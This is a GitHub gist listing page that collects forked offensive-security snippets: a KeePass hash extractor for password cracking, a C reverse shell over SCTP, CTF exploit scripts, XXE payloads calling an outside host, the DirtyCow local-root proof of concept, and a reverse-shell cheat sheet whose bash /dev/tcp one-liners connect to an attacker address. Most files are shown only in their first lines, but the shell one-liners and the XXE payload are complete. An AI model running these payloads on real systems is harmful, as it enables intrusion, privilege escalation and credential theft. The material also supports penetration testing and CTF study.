Skip to content

Instantly share code, notes, and snippets.

waywardsun /
Created Dec 21, 2017 — forked from HarmJ0y/
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
# Python port of keepass2john from the John the Ripper suite (
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from:
# Python port by @harmj0y, GNU General Public License
waywardsun / reverse_sctp_shell.c
Created Aug 11, 2017 — forked from 0xabe-io/reverse_sctp_shell.c
Simple C code to create a reverse shell over SCTP
View reverse_sctp_shell.c
// server: ncat -v --sctp -l PORT_NUM
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
waywardsun /
Created Jun 19, 2017 — forked from saelo/
Solution for "assignment" of GoogleCTF 2017
#!/usr/bin/env python3
# Exploit for "assignment" of GoogleCTF 2017
# CTF-quality exploit...
# Slightly simplified and shortened explanation:
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this two leak a
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
waywardsun /
Created Jun 1, 2017 — forked from m1ghtym0/
POC exploit for toilet service of FAUST-CTF-2017
#!/usr/bin/env python2
from pwn import *
from re import findall
from random import choice, randint
from string import digits, ascii_uppercase
from hashlib import sha256
from sys import argv, exit
waywardsun /
Created May 17, 2017 — forked from trietptm/
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

View gist:84496cb1e4eeab23e421a6a0af60a3fa
my slides:
official docs:
some tutorials from the internet:
waywardsun / cowroot.c
Created Oct 21, 2016 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
View cowroot.c
* (un)comment correct payload first (x86 or x64)!
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
View reverse_shells
bash -i >& /dev/tcp/ 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3